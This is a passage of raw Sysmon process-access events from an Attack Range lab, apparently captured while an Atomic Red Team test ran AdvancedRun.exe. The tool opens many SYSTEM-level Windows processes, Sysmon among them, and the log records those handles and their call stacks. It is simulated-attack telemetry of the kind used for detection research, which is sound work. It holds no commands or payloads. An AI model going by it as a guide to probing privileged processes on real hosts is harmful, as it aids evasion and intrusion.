17:59:00.695{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3400-000000002702}2460C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983210Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.695{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3300-000000002702}2488C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983209Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.695{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-6100-000000002702}4392C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-2 10341000x80000000000000003983208Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.695{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3200-000000002702}1948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983207Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.695{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3100-000000002702}660C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003983206Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.695{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5C00-000000002702}4148C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983205Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.695{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3000-000000002702}668C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983204Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.695{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5B00-000000002702}4100C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983203Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.695{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5500-000000002702}4052C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983202Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.695{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF7-61EA-5300-000000002702}3936C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983201Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.695{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-2F00-000000002702}2440C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983200Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.695{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF6-61EA-4300-000000002702}3824C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983199Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.695{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF4-61EA-2D00-000000002702}2988C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983198Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.695{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3F00-000000002702}3552C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983197Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.695{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF2-61EA-2C00-000000002702}2896C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983196Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.695{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3E00-000000002702}3416C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983195Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.695{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF2-61EA-2B00-000000002702}2888C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983194Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.695{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3C00-000000002702}2860C:\Program 